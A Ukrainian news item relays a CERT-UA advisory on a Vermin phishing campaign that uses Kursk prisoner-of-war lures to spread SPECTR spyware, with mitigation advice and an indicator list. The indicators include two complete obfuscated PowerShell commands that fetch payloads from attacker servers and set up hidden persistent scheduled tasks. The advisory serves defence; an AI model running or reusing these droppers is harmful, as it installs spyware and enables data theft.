Урядова комп’ютерна група реагування на надзвичайні ситуації CERT-UA спостерігала кібератаки з хакерами, які розсилали людям електронні листи про військовополонених з Курської області Росії.
Слід зазначити, що такі листи містять фотографії заявлених військовополонених і посилання на архів list_kursk.zip. Пакет містить файл .CHM під назвою «Список вилучених військовослужбовців». Курськ.
Коли ви відкриваєте цей файл, шпигунські компоненти SPECTR завантажуються на ваш комп’ютер разом із FIRMACHAGENT, який використовується для завантаження викрадених даних на сервер.
Атаку здійснила організація UAC-0020 (Вермін), пов’язана зі спецслужбами тимчасово окупованого Луганська на сході України.
CERT-UA рекомендує користувачам вжити наступних заходів для захисту від таких кіберзагроз:
- Щоб зменшити площу атаки, обмежте дозволи облікових записів користувачів, видаливши їх із груп адміністраторів/адміністраторів.
- Використовуйте належні політики (SRP/AppLocker), щоб запобігти доступу користувачів до файлів .CHM і powershell.exe.
“Якщо ви підозрюєте, що стали жертвою кібератаки, негайно зв’яжіться з CERT-UA”, – зазначили в прес-службі.
фон:
- Увечері 16 серпня на монобанк, один із найбільших банків України, була здійснена масштабна DDOS-атака.
- За третій день поспіль кібератак фінансова установа отримала близько 5,5 мільярдів шкідливих запитів.
- Напад закінчився через три дні.
- «Всього за три дні ми отримали понад 7,5 мільярдів запитів на наші послуги. Ми ніколи не знижували темпів і не припиняли обслуговування клієнтів», – зазначив генеральний директор monobank Олег Гороховський.
Індикатори кіберзагроз
Файли:
• 65e5f73193f87e233244479859a00fd1 4d8918cfcc97ca63666937e5d53373793f3695a2b1177e27a78aa34303c2ee80 spysok_kursk.zip
• 4dd66548c1022822cf8247ca615ceea9 68fe595237eec1261184a5f3a00cc0f678a33751615796942001997575887557 список вп, що вибувають. курск.chm
• b58e45c4707b88dc1e89fd58359bfd5b d44ff1bd3c7ff81228548c82ea68c33bdea780772ce55dc4be2d4156985a326a part.html
• 580a05ffdb0f3d5d703ccb2bcf04f9b7 8612668466f9c8a180e0e9a3c92c85a03788f2f0bb3c6bf70f52c356e02702db Browser.txt
• b99d5bfcdf9535f094204137ab064c96 eef9f73dc7e0cdd4b1780ecd20845496a91e0f1c096264208d991935c5e97308 Files.txt
• 7d439f13a55f082fd674875f898197d7 8987952745a8d46a8f2e6d1666cc9c542b6a9a96787ef467c76b779a8b6c1a66 Social.txt
• 522c2988dd63e162503c41dc87d631f6 ad30e29ba883c3f528d2782dbc3d1b5258815b619c6dfc3639fee416cf27fb1f Screen.txt
• a3c977578212134897a864795e769a8d 3e6c13f9e4cee9b8d55d7a83fd3c3d5d6d09b6c477c4f84fd79db6cc8de7ea42 USB.txt
• d657fa0c86523d0376cc0c988c6c9e11 180f9a2d3de0b5f031408797286837bb4b10b2a6d8797cf985347f5d80f9e4a0 IDCLIPNET_x86.txt
• e2c25142f08cd8f9c6f87266c7ffb829 8d4808ed167ac91724e8ab4da24bcc3bd2159a4972c212a1cd4062f02a3731d0 chrome_updater.txt
• f8efa529dff81b0e02a786fc766ffca3 21c33c8365218b7fb1bbb0d45af77926877fb33384ef58fbbb6db04b9df55eb6 Browser.dll
• ef123bc71a5f0e323b6a5c809d17d048 087158ad28080ef438047b88896dfa1962d1cd6fed8fce06e35c25f91ad5f1ff Files.dll
• 2972616c870bffdb1978b487df290dfe b95ef984bfb22c55881931b134deaf1b848fbfda4180fc393b9f532f51089cbb Screen.dll
• 7dc1016e78f8c243b3b0fa59eb648567 f00c85d9db7a2a2bf248771b8d81d978fa6d2153e6a3095d9c5896b604e9d00d Social.dll
• a973224da0ebfca023ab3e55913447a9 6a18392e3e062ce0fcd4688c0b09e482855cf709eb178437d8fe2cdc9cfdf51f USB.dll
• a9261e37a5a2fadbf58c71f15f48ad18 d16239cfbee14a8621637934aebe2d5253fea04940d2eb082bd8dcdc41111d4b IDCLIPNET_x86.dll
• e5b69e06a2452914250e34be1de4ae6a f94b8d2391b53dfb96035a2ba628224c3bfedf77021c896b64a0d7c8f2121e17 chrome_updater.dll
• f6b21151b924a31b936d3b299c0129b7 ea1945d887cbe8a56234cec6da2c46ed7a28ae6a69fd49181b3d13a71943ffd9 agent.cer
Мережеві:
• [email protected]
• hXXp://171[.]22.120.50/data/Browser[.]txt
• hXXp://171[.]22.120.50/data/Files[.]txt
• hXXp://171[.]22.120.50/data/IDCLIPNET_x86[.]txt
• hXXp://171[.]22.120.50/data/Screen[.]txt
• hXXp://171[.]22.120.50/data/Social[.]txt
• hXXp://171[.]22.120.50/data/USB[.]txt
• hXXp://171[.]22.120.50/data/chrome_updater[.]txt
• hXXp://prozorro[.]online/info/docx/recon
• hXXps://prozorro[.]online/data/spysok_kursk.zip
• hXXps://ukraero[.]space/jobs/download
• hXXps://ukraero[.]space/jobs/upload
• prozorro[.]online 2024-08-10 @beget.com
• ukraero[.]space 2024-07-30 @beget.com
• 171[.]22.120.50
• 91[.]225.219.185
Хостові:
• %APPDATA%\sync\Master_Share\
• %APPDATA%\sync\Slave_Sync\
• %APPDATA%\sync\Slave_Sync.br\
• %APPDATA%\sync\Slave_Sync.fs\
• %APPDATA%\sync\Slave_Sync.scrn\
• %APPDATA%\sync\Slave_Sync.soc\
• %APPDATA%\sync\Slave_Sync.usb\
• %LOCALAPPDATA%\Google\ChromeDev\IDCLIPNET_x86.dll
• %LOCALAPPDATA%\Google\ChromeDev\chrome_updater.dll
• %LOCALAPPDATA%\Google\ChromeDev\ext\Browser.dll
• %LOCALAPPDATA%\Google\ChromeDev\ext\Files.dll
• %LOCALAPPDATA%\Google\ChromeDev\ext\Screen.dll
• %LOCALAPPDATA%\Google\ChromeDev\ext\Social.dll
• %LOCALAPPDATA%\Google\ChromeDev\ext\USB.dll
• ChromeDev (змінна оточення)
• FA_id (змінна оточення)
• GoogleChromeUpdateDailyTask (ScheduledTask)
• MicrosoftEdgeUpdateTaskMachineReg (ScheduledTask)
• cmd /c start “” /min Powershell -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command “& {${00101111000001100} = ([System.IO.Path]::Combine($env:LOCALAPPDATA,$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘RwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBEAGUAdgA=’)))));(New-Object -TypeName Net.WebClient).DownloadString($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘aAB0AHQAcAA6AC8ALwBwAHIAbwB6AG8AcgByAG8ALgBvAG4AbABpAG4AZQAvAGkAbgBmAG8ALwBkAG8AYwB4AC8AcgBlAGMAbwBuAA==’))));function _01101010000111101 { param ([Parameter(Mandatory=$true, Position=0)][string]${_10001101001110110},[Parameter(Mandatory=$true, Position=1)][string]${_00100001000101000},[Parameter(Mandatory=$true, Position=2)][bool]${_10100000111101111}) ${01101101001111101} = $null; ${01001011111010001} = ($env:userdomain + ‘\’ + $env:UserName); if (${_10100000111101111}) { ${01101101001111101} = New-ScheduledTaskTrigger -User ${01001011111010001} -AtLogOn; } else { ${01101101001111101} = New-ScheduledTaskTrigger -Once -At 06:00 -RepetitionInterval (New-TimeSpan -Minutes 15) -RepetitionDuration (New-TimeSpan -Days (365 * 20)); } ${10100100010101010} = New-ScheduledTaskAction -Execute $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘cgB1AG4AZABsAGwAMwAyAA==’))) -Argument $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘JAB7AF8AMAAwADEAMAAwADAAMAAxADAAMAAwADEAMAAxADAAMAAwAH0ALABFAHgAZQBjAHUAdABlAA==’))); ${01011111001000001} = New-ScheduledTaskPrincipal -LogonType Interactive -UserId ${01001011111010001}; ${01000001100001000} = Register-ScheduledTask -Principal ${01011111001000001} -Action ${10100100010101010} -TaskName ${_10001101001110110} -Force; ${01111100011011111} = New-ScheduledTaskSettingsSet -RestartCount 5 -RestartInterval $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘MAAwADoAMAAxADoAMAAwAA==’))) -StartWhenAvailable:$true -Compatibility Vista -DisallowHardTerminate:$true -AllowStartIfOnBatteries:$true -DontStopIfGoingOnBatteries:$true -MultipleInstances IgnoreNew; Set-ScheduledTask -Settings ${01111100011011111} -Trigger ${01101101001111101} -TaskPath ‘\’ -TaskName ${_10001101001110110};}_01101010000111101 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘TQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUgBlAGcA’))) ([System.IO.Path]::Combine(${00101111000001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘SQBEAEMATABJAFAATgBFAFQAXwB4ADgANgAuAGQAbABsAA==’))))) $true;_01101010000111101 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘RwBvAG8AZwBsAGUAQwBoAHIAbwBtAGUAVQBwAGQAYQB0AGUARABhAGkAbAB5AFQAYQBzAGsA’))) ([System.IO.Path]::Combine(${00101111000001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YwBoAHIAbwBtAGUAXwB1AHAAZABhAHQAZQByAC4AZABsAGwA’))))) $false;}”
• cmd /c start “” /min Powershell -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command “& {${10110010001011011} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘aAB0AHQAcAA6AC8ALwAxADcAMQAuADIAMgAuADEAMgAwAC4ANQAwAC8AZABhAHQAYQAvAA==’)));${00001000111001010} = ([System.IO.Path]::Combine($env:LOCALAPPDATA,$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘RwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBEAGUAdgA=’)))));${10010101001110001} = ([System.IO.Path]::Combine(${00001000111001010},$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘ZQB4AHQA’)))));ni -ItemType Directory -Path ${00001000111001010} -erroraction $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘cwBpAGwAZQBuAHQAbAB5AGMAbwBuAHQAaQBuAHUAZQA=’)));ni -ItemType Directory -Path ${10010101001110001} -erroraction $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘cwBpAGwAZQBuAHQAbAB5AGMAbwBuAHQAaQBuAHUAZQA=’)));[Environment]::SetEnvironmentVariable($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘QwBoAHIAbwBtAGUARABlAHYA’))), ${00001000111001010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘VQBzAGUAcgA=’))));[Environment]::SetEnvironmentVariable($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘RgBBAF8AaQBkAA==’))), $env:computername, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘VQBzAGUAcgA=’))));function _01010010000110001(${_00011000010101000},${_01011010100111110}) { ${00100010000111010} = ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘ewAwAH0AewAxAH0ALgB0AHgAdAA=’))) -f ${10110010001011011}, ${_00011000010101000}); ${00100001001111010} = ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘ewAwAH0AXAB7ADEAfQAuAGQAbABsAA==’))) -f ${_01011010100111110}, ${_00011000010101000}); rd -Path ${00100001001111010} -Force -erroraction $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘cwBpAGwAZQBuAHQAbAB5AGMAbwBuAHQAaQBuAHUAZQA=’))); ${00111101001011101} = (New-Object -TypeName Net.WebClient).DownloadString(${00100010000111010}); ${01111111110110000} = ${00111101001011101}.Length; ${01001101111001001} = New-Object byte[] (${01111111110110000} / 2); for (${01101011110010000} = 0; ${01101011110010000} -lt ${01111111110110000}; ${01101011110010000} += 2) {${01001101111001001}[${01101011110010000} / 2] = [Convert]::ToByte(${00111101001011101}.Substring(${01101011110010000}, 2), 16)} [IO.File]::WriteAllBytes(${00100001001111010}, ${01001101111001001});}_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘QgByAG8AdwBzAGUAcgA=’))) ${10010101001110001};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘RgBpAGwAZQBzAA==’))) ${10010101001110001};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘UwBjAHIAZQBlAG4A’))) ${10010101001110001};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘UwBvAGMAaQBhAGwA’))) ${10010101001110001};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘VQBTAEIA’))) ${10010101001110001};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘SQBEAEMATABJAFAATgBFAFQAXwB4ADgANgA=’))) ${00001000111001010};_01010010000110001 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YwBoAHIAbwBtAGUAXwB1AHAAZABhAHQAZQByAA==’))) ${00001000111001010};Start-ScheduledTask -TaskName $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘TQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUgBlAGcA’))) -ErrorAction SilentlyContinue}”